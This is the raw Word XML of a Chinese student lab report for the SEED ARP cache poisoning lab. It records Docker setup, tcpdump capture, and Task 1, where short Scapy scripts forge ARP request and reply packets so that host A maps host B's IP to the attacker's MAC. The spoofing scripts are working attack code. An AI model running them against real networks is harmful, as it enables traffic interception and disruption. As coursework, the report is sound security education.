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081076">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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t>ARP Cache Poisoning Attack Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522C3CC3">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:eastAsia="仿宋"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验报告需求：按实验指导书按步执行，实验报告记录执行的命令，对执行结果截屏，并对指导书中提出的问题进行回答和截屏展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0623D89D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实验环境设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2839B55C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5270500" cy="1935480"/>
            <wp:effectExtent l="0" t="0" r="6350" b="7620"/>
            <wp:docPr id="1453304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0424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859">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动Docker，并进入docker环境,准备实验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 w14:paraId="7610F7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211D2494">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>任务：启动docker并进入实验环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="43DC5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401B8AC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51165ACD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d Labsetup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61A64CC7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cup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="266A7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87F1A5D">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>截图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7693FD54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688205" cy="3369310"/>
                  <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                  <wp:docPr id="8799538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95380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36" cy="33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1FA5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D8D54C8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">dockps </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="48E01C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176908F">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>截图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C8FEF67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0500" cy="945515"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="6985"/>
                  <wp:docPr id="249818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8189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CB8B4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B874BE3">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>说明各docker对应的作用:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="291BD3B3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1.A (hostA-10.9.0.5):hostA 是实验中的一个目标机器。它的 IP 地址是 10.9.0.5。在 ARP 缓存中毒攻击实验中，hostA 作为被攻击的目标之一。攻击者可以向 hostA 发送伪造的 ARP 响应来修改其 ARP 缓存，使 hostA 认为攻击者的 MAC 地址是某个特定的 IP 地址（比如B的 IP 地址）。通过这种方式，攻击者可以拦截或中断 hostA 与其他主机的通信。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="793001D7">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2. hostB (hostB-10.9.0.6):hostB 是实验中的另一个目标机器。它的 IP 地址是 10.9.0.6。与 hostA 类似，hostB 也是 ARP 缓存中毒攻击的潜在目标。攻击者可以伪造 ARP 响应来修改 hostB 的 ARP 缓存，诱导 hostB 将某个 IP 地址（如 hostA 或 hostC 的 IP 地址）与攻击者的 MAC 地址关联。这可以帮助攻击者在 hostB 和其他主机之间进行中间人攻击（MITM）或导致流量中断。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58B18142">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3. 攻击者容器 (attacker container):攻击者容器是实验中的攻击者机器。它的配置与其他容器不同，具有特权模式（privileged mode）并且有一个共享文件夹（共享卷）。特权模式: 攻击者容器配置为特权模式，以便能够执行需要高权限的操作，例如修改内核参数（使用 sysctl 命令）来启用 IP 转发。这对于在容器内执行 ARP 攻击或其他网络攻击是必要的，因为这些操作通常需要高级别的系统权限。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44EC497F"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39A55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0" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37CC74B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>任务：在在SEED环境和容器环境使用tcpdump命令查看能捕捉到的报文</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="74DCEB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833AB28">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B4941AB">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>tcpdump -i eth0 -n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A00A317">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP address</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1139E398">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>位置：容器中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="662B93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B0C0813">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>截图：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="782ADF9F">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1.A-10.9.0.5：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23EDD415">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5025390" cy="949960"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="2540"/>
                  <wp:docPr id="82777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778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7" cy="95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0BE3F">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4903470" cy="1471930"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="190791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9118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943" cy="147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3B9F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（PING 百度时监听到的报文</w:t>
            </w:r>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EE2A542">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4976495" cy="2534285"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1683845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8452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767" cy="253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91102"/>
          <w:p w14:paraId="73810D91">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2.B-10.9.0.5：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C0F5E10">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4853940" cy="2478405"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                  <wp:docPr id="16680287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02879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128" cy="248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9D9EB"/>
          <w:p w14:paraId="0E95E11B">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3.M-10.9.0.105</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5940D156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006340" cy="2747010"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                  <wp:docPr id="4137685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7685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428" cy="275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CB654">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="68132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3983C65B">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果说明：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D96B9F1">
            <w:pPr>
              <w:pStyle w:val="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 xml:space="preserve">首先，我在A上运行：tcpdump -i eth0 -n，并且ping </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> HYPERLINK "http://www.baidu.com"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www.baidu.com</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="8"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，接收到相应报文信息。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="523C7BFF">
            <w:pPr>
              <w:pStyle w:val="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其次，我使用ip address查看各docker的地址，得出结果：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="480CA969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A_ip = "10.9.0.5"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28CBF81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A_mac = "02:42:0a:09:00:05"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33F84C4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B_ip = "10.9.0.6"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="579286FF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B_mac = "02:42:0a:09:00:06"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B51CA9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M_ip = "10.9.0.105"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30B342B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M_mac = "02:42:0a:09:00:69"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41BA87F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BFE4CD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实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D7C773">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.1 Task 1: ARP Cache Poisoning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58AEBB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20B68B5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>任务：按照任务书要求使用ARP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Reqeust报文进行ARP攻击，</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ABCD11B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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2E189D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8A21115">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令(ip在环境配置那一步已经查看)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7587FA90">
            <w:pPr>
              <w:pStyle w:val="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编写arp.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="047A2BA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#!/usr/bin/python3 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DE85AD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from scapy.all import * </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35F1A90C">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="12EEFB0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A_ip = "10.9.0.5"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75209121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A_mac = "02:42:0a:09:00:05"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D6CA68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B_ip = "10.9.0.6"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C3D9FE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B_mac = "02:42:0a:09:00:06"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="732B209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M_ip = "10.9.0.105"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="588D9D3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M_mac = "02:42:0a:09:00:69"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BD428F5">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="253415C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eth = Ether(src=M_mac,dst='ff:ff:ff:ff:ff:ff') </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A340D71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arp = ARP(hwsrc=M_mac, psrc=B_ip,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19F490F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hwdst=A_mac, pdst=A_ip,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56699F81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op=1) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D1900EA">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3344DDCF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pkt = eth / arp </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="565D2F7D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sendp(pkt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B225F8B">
            <w:pPr>
              <w:pStyle w:val="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在M中运行arp.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="431DAABD">
            <w:pPr>
              <w:pStyle w:val="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用wireshark抓包</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="424D6496">
            <w:pPr>
              <w:pStyle w:val="9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查看A：arp -n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7446E8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CAF80BE">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>截图</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0513B2D5">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4932680" cy="1984375"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="0"/>
                  <wp:docPr id="10327185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7185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892" cy="198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D2B64">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="26A8EABF"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1381760</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="4850765" cy="386080"/>
                      <wp:effectExtent l="0" t="0" r="26670" b="13970"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1497679944" name="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0721" cy="3862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" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:0.2pt;margin-top:108.8pt;height:30.4pt;width:381.95pt;z-index:251659264;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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nkkb41gAAAAgBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93&#10;bnJldi54bWxQSwECFAAUAAAACACHTuJAOCkN/HQCAADUBAAADgAAAAAAAAABACAAAAAlAQAAZHJz&#10;L2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZAQAACw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12995" cy="2122805"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="0"/>
                  <wp:docPr id="5778875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8875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492" cy="212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7A926"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1735455</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2967990" cy="186055"/>
                      <wp:effectExtent l="0" t="0" r="22860" b="24130"/>
                      <wp:wrapNone/>
                      <wp:docPr id="116705118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8132" cy="1858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" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:5.95pt;margin-top:136.65pt;height:14.65pt;width:233.7pt;z-index:251660288;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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PG4T01wAAAAoBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93&#10;bnJldi54bWxQSwECFAAUAAAACACHTuJARhWKh3MCAADUBAAADgAAAAAAAAABACAAAAAmAQAAZHJz&#10;L2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZAQAACw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059680" cy="1931670"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="0"/>
                  <wp:docPr id="924143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432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12" cy="193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E8DEB"/>
          <w:p w14:paraId="5710A820">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>结果分析：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2667CFCA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1.看到伪造的 ARP 请求数据包，其中目标主机 A 收到了包含错误 MAC 地址的 ARP 请求。这表明 ARP 请求已成功发送并被网络接收。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0160A92E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2.在 A 上，ARP 缓存表中的 10.9.0.6（即 B 的 IP 地址）应映射到 M 的 MAC 地址（02:42:0a:09:00:69）。这表明 A 的 ARP 表已被伪造的 ARP 请求条目所污染，从而完成了 ARP 欺骗。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F4CD010"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7FD92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0" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20D6D580">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>任务：按照任务书要求使用ARP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Reply报文分别在ARPCache中有相应表项和没有相应表项的情况下进行ARP攻击，</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CC94140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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="52A48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1FB0D8C">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0750F7C2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修改arp.py程序：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F5B031F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#!/usr/bin/python3 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41939BA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from scapy.all import * </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56C6EB8C">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2847353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A_ip = "10.9.0.5"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ED0A91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A_mac = "02:42:0a:09:00:05"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35F4913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B_ip = "10.9.0.6"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02745A2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B_mac = "02:42:0a:09:00:06"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44B35C3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M_ip = "10.9.0.105"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FE57FD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M_mac = "02:42:0a:09:00:69"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12669ED2">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="05E7A2D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eth = Ether(src=M_mac,dst=A_mac) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="225F406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arp = ARP(hwsrc=M_mac, psrc=B_ip,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B3602D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hwdst=A_mac, pdst=A_ip,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2217A2A9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op=2) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FC7FBD7">
            <w:pPr>
              <w:pStyle w:val="9"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="36156E21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pkt = eth / arp </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00184E88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sendp(pkt)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="156AFA09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在B上ping A：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="641D02DB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ping 10.9.0.5 -c 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4854690F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在A上查看：arp -n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23578306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在M上运行arp.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F3850EF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用wireshark抓包</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="641FAE56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在A上查看：arp -n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B289149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删除A中关于B的记录：arp -d 10.9.0.6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E40144D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再次在M上运行：arp,py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="021AF0BE">
            <w:pPr>
              <w:pStyle w:val="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用wireshark抓包</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="487F31C1">
            <w:pPr>
              <w:pStyle w:val="9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查看A：arp -n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="512D45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3088F42">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>截图</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DD23F4C"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323215</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="4562475" cy="454660"/>
                      <wp:effectExtent l="0" t="0" r="10160" b="21590"/>
                      <wp:wrapNone/>
                      <wp:docPr id="283730808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62220" cy="454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" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:-2.45pt;margin-top:25.45pt;height:35.8pt;width:359.25pt;z-index:251661312;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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/aW9jXAAAACQEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3du&#10;cmV2LnhtbFBLAQIUABQAAAAIAIdO4kBylkgScgIAANMEAAAOAAAAAAAAAAEAIAAAACY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507230" cy="1492885"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="0"/>
                  <wp:docPr id="17142287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2287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217" cy="14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BBA56">
            <w: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591185</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="4792345" cy="322580"/>
                      <wp:effectExtent l="0" t="0" r="27940" b="20320"/>
                      <wp:wrapNone/>
                      <wp:docPr id="2088246143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92043" cy="3227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4" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:1.75pt;margin-top:46.55pt;height:25.4pt;width:377.35pt;z-index:251662336;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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HGJlrWAAAACAEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3du&#10;cmV2LnhtbFBLAQIUABQAAAAIAIdO4kDJAAKXcwIAANQEAAAOAAAAAAAAAAEAIAAAACU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854575" cy="1216025"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
                  <wp:docPr id="1512824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8240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7" cy="121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6E23C">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4688205" cy="901065"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="12276071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60718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131" cy="9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33DDE">
            <w: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1670685</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2733675" cy="175895"/>
                      <wp:effectExtent l="0" t="0" r="10160" b="14605"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1442209133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3420" cy="176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5" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:0.2pt;margin-top:131.55pt;height:13.85pt;width:215.25pt;z-index:251663360;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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0N62jNYAAAAIAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25y&#10;ZXYueG1sUEsBAhQAFAAAAAgAh07iQKiuZHZyAgAA1AQAAA4AAAAAAAAAAQAgAAAAJQEAAGRycy9l&#10;Mm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAAAk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732020" cy="1816735"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="16280703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0703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575" cy="18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806FC">
            <w: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2716530</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>559435</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1584325" cy="224790"/>
                      <wp:effectExtent l="0" t="0" r="16510" b="22860"/>
                      <wp:wrapNone/>
                      <wp:docPr id="842459617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4308" cy="2249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6" o:spid="_x0000_s1026" o:spt="1" style="position:absolute;left:0pt;margin-left:213.9pt;margin-top:44.05pt;height:17.7pt;width:124.75pt;z-index:251664384;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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2DN/l1wAAAAoBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93&#10;bnJldi54bWxQSwECFAAUAAAACACHTuJAOWJjinMCAADTBAAADgAAAAAAAAABACAAAAAmAQAAZHJz&#10;L2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZAQAACw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693285" cy="1193165"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6985"/>
                  <wp:docPr id="1730204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20480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384" cy="119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11439">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4928870" cy="319405"/>
                  <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
                  <wp:docPr id="1898981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98138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684" cy="32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8EE8E">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4610100" cy="830580"/>
                  <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                  <wp:docPr id="921557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573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072" cy="83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B7CB8">
            <w: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1468120</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2723515" cy="215265"/>
                      <wp:effectExtent l="0" t="0" r="19685" b="13970"/>
                      <wp:wrapNone/>
